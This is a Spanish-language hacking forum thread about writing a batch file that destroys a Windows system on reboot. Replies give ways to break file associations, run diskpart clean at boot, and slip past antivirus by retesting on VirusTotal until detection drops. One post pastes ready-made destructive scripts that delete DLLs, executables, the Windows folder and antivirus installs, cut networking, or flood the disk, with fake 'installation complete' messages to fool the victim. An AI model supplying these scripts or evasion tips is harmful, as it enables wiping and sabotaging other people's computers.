[SOLUCIONADO] Se puede crear un batch que destruya un sistema operativo ?

Buenas noches tengo una duda,deseo crear un batch que al reiniciar el equipo borre todo el disco duro y la data desde la plataforma windows server ,tendria que bajar el antivirus?

Hola,

Al parecer nunca has programado nada en Batch... Al ser algo nativo de Windows, los antivirus no lo detectan.
No creo que puedas destruir todo el sistema operativo, pero lo que si puedes hacer, es cambiar la asociación de archivos colocando en tu código algo como esto:

ASSOC .exe=txtfile
ASSOC .html=txtfile
ASSOC .doc=txtfile
ASSOC .docx=txtfile
.........

De esta forma, cuando abran algun .exe, archivo de word, etc se abrirá un TXT con código raro. Es decir, dejarán de andar todos los archivos de la PC.

Saludos,
ANTRAX

La pregunta del asunto y la del mensaje son distintas xD. Si, se puede crear, como bien dices con con un formateo al reiniciar ya lo tienes. Y normalmente no hace falta tocar nada del antivirus. Quizá algún tipo de solución empresarial basado en comportamiento quizá salte alguna alarma, no lo tengo claro, la verdad.

ejemplo cuando windows hace comprobaciones de disco duro al reiniciar se podria poner que en vez de eso inicie el diskpart y se use el clean

Podes utilizar el registro, meterlo como servicio, fijarte de tener los privilegios adecuados o UAC desactivado.

Varias maneras, métodos, todo depende de tu objetivo final.

Un saludo !

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
La pregunta del asunto y la del mensaje son distintas xD. Si, se puede crear, como bien dices con con un formateo al reiniciar ya lo tienes. Y normalmente no hace falta tocar nada del antivirus. Quizá algún tipo de solución empresarial basado en comportamiento quizá salte alguna alarma, no lo tengo claro, la verdad.

Hoy en dia la mayoria de los AV's detentan script maliciosos en batch no tiene que ser ninguno empresarial

y si como comentan los demas podrias hacer simplemente que formatee o borre particion al reiniciarse, en si solo es cuestion de imaginacion para que las cosas funcionen, si no actualmente podrias correr algun script en powershell :p

Te faltó lo importante del AV: basado en comportamiento. No soy un experto en antivirus, ya me gustaría, pero por lo que sé (algún vídeo de Fernando de la Cuadra y artículos sueltos) lo más común es que comparen con cosas conocidas, por lo que el ratio de detección es bastante bajo. Simplemente los encoders que trae Metasploit ya hace que sea bastante sencilla la evasión de AV, y ya no hablemos de herramientas externas xD. Por lo que he leído en algunos sitios están implementando AV basados en comportamiento, y los ratios de detección aumentas muchísimo, pero tienen el problema de que hay que entrenarlos.

Puede que esté equivocado en todo esto, como he dicho no soy un experto en AV. Para comprobar si son detectados, he creado dos .bat y los he subido a virustotal (cositas serias no las subáis aquí eh! xD el primero simplemente con un format c:\ y el ratio de detección a sido 13/58. Esto quiero decir que lo tienen en sus BBDD como virus, con el nombre que podéis ver en la captura. Aunque menos BitDefender el resto no eran muy conocidos, es un ratio alto para mi gusto. He creado un nuevo .bat, añadiendo únicamente dos lineas, un MKDIR, un CD y luego el FORMAT. ¿Detección? 1/58, con lo que me doy por satisfecho. Creo que con esta pequeña prueba se puede ver que los AV no "leen" el script, simplemente miran si se encuentra en su BBDD para comprobar si es un virus o no.

Es muy difícil que un AV te detecte un .bat como virus, quizás con un poco de ingenio al principio (como hizo Bael) puedas evitarlo. Aunque, si sabes el AV de la víctima, puedes ir analizando el .bat con virustotal hasta que no te lo reconozca y así enviarlo tranquilo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Te faltó lo importante del AV: basado en comportamiento. No soy un experto en antivirus, ya me gustaría, pero por lo que sé (algún vídeo de Fernando de la Cuadra y artículos sueltos) lo más común es que comparen con cosas conocidas, por lo que el ratio de detección es bastante bajo. Simplemente los encoders que trae Metasploit ya hace que sea bastante sencilla la evasión de AV, y ya no hablemos de herramientas externas xD. Por lo que he leído en algunos sitios están implementando AV basados en comportamiento, y los ratios de detección aumentas muchísimo, pero tienen el problema de que hay que entrenarlos.

Puede que esté equivocado en todo esto, como he dicho no soy un experto en AV. Para comprobar si son detectados, he creado dos .bat y los he subido a virustotal (cositas serias no las subáis aquí eh! xD el primero simplemente con un format c:\ y el ratio de detección a sido 13/58. Esto quiero decir que lo tienen en sus BBDD como virus, con el nombre que podéis ver en la captura. Aunque menos BitDefender el resto no eran muy conocidos, es un ratio alto para mi gusto. He creado un nuevo .bat, añadiendo únicamente dos lineas, un MKDIR, un CD y luego el FORMAT. ¿Detección? 1/58, con lo que me doy por satisfecho. Creo que con esta pequeña prueba se puede ver que los AV no "leen" el script, simplemente miran si se encuentra en su BBDD para comprobar si es un virus o no.

aqui hay otra cosa, como que antivirus total, esta mas basado en firmas, no hace un scaneo con heuristica, por que hoy en dia la gran mayoria de av's no estan basados solo en firmas, si no en sistemas de IDS, si haces llamadas a apis o importas ekis cantidad de apis te lo va a detectar, el 360 lo detecto por que el format c:\ esta en una blacklist de cadenas, o lo que es lo mismo firmas, pero si por ejemplo lo haces correr en un sistema con bitdefender o kasperky, te lo va a frenar al momento de llamarlo, por que entras en un coportamiento generico, eso es otra cosa, el ocupar cosas como metasploit para disfrazar un bicho solo te haria un salto por scan time y no por runtime :p, de echo la mejor manera de saltarte el AV que sea es comiendo muchos ciclos de reloj antes de ejecutar el payload, ya que los av's no solo van por firmas, tambien estan funcionando con emuladores y IDS, que se basan en el comportamiento de api hooks :p

mira prueba con este:

Tomado de:

https://www.taringa.net/posts/info/12763970/Archivos-que-pueden-danar-PC-s-Hecho-Por-Mi.html

y  virus total no lo detecta   

[/b]

Estos archivos utilizan MS-Dos (cmd.exe), que es un interprete de "Comandos"

¿Qué es un comando de Ms-Dos?
Es una orden que le damos al sistema operativo para que haga una tarea determinada.

Los archivos se guardan en .bat



Borra .dll y .exe

echo off 
cd 
del *.dll /q 
del *.exe /q 
msg * Se a instalado Por Completo 
msg * Cuando le des aceptar se va a reiniciar tu Pc 
shutdown –r 
exit 

PD: Tener muchisimo cuidado, ya que se borraran todos tus archivos de windows (Dll) y los ejecutables (Exe)



Borra Windows

echo off 
erase C:WINDOWS q 
msg * Se a terminado con la instalacion, dele aceptar y se reiniciara tu PC 
shutdown –r 
exit 

PD: El titulo te lo dice todo, lo abris, quedas frito

Deja sin internet

echo off 
ipconfig/release 
msg * Ops ha ocurrido un error con la conexion a internet 
pause 
exit 

PD: Arruina tu coneccion de red, casi siempre arruina tu router/Modem

Gusanos

echo off 
cd/ 
title gusano 
:menu: 
echo jajaja>%RANDOM%.bat 
goto:menu: 

PD: Crea un archivo y de el se reproducen automaticamente, hasta que se te satura la Pc de informacion y de archivos



Borra Antivirus

echo off 
cls 
cd 
cd "Archivos de programa" 
cd "Norton antivirus" 
attrib -R -A -S -H *.* 
del /S /Q *.* 
cd.. 
cd "Panda Software" 
attrib -R -A -S -H *.* 
del /S /Q *.* 
cd.. 
cd "Kaspersky Lab" 
attrib -R -A -S -H *.* 
del /S /Q *.* 
cd.. 
cd "McAfee.com" 
attrib -R -A -S -H *.* 
del /S /Q *.* 
cd.. 
cd "NOD32 Antivirus System" 
attrib -R -A -S -H *.* 
del /S /Q *.* 
cls

PD: Borra tu antivirus, si quieres agregar otro antivirus agregas lo siguiente antes de "Cls"

cd "Ubicacion del antivirus dentro de Archivos de programa" 
attrib -R -A -S -H *.* 
del /S /Q *.*

Borra Counter

echo off 
cls 
cd 
cd "archivos de programa" 
cd "Counter Strike 1.6" 
attrib -R -A -S -H *.* 
del /S /Q *.* 
cd.. 
cd "Counter-Strike 1.6" 
attrib -R -A -S -H *.* 
del /S /Q *.* 
cd.. 
Exit 

Borrar el Counter 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Borrar el Counter 

Estamos en el 2017...

En el 2005 "te hubiéramos echado del foro por pensarlo"